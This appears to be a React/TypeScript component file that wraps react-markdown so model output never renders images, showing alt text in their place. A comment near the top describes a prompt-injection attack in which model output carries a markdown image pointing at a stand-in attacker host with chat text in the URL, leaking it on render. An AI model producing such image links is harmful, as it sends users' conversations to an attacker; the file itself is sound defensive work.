import ReactMarkdown, { type Components, type ExtraProps, type Options } from "react-markdown";
import type { ComponentPropsWithoutRef } from "react";

export type SafeMarkdownProps = Pick<
  Options,
  "children" | "components" | "remarkPlugins" | "rehypePlugins" | "urlTransform"
>;

// Model output is attacker-influenced (prompt injection). A markdown image such as
// ![](https://attacker.example/?d=<chat text>) makes the browser fetch that URL the
// moment the answer renders, exfiltrating whatever the model put in it, and our CSP
// is report-only. So no surface renders an <img> from markdown: the alt text stands
// in for it. Links are unaffected because they need a click. ENG-2247.
function MarkdownImageAsAltText({ alt }: ComponentPropsWithoutRef<"img"> & ExtraProps) {
  return alt ? <span>{alt}</span> : null;
}

// Every react-markdown render in app/frontend goes through here; a guard test fails
// on any direct import. `img` is forced after the caller's components so it cannot
// be re-enabled.
export function SafeMarkdown({ components, ...props }: SafeMarkdownProps) {
  const safeComponents: Components = { ...components, img: MarkdownImageAsAltText };
  return <ReactMarkdown {...props} components={safeComponents} />;
}
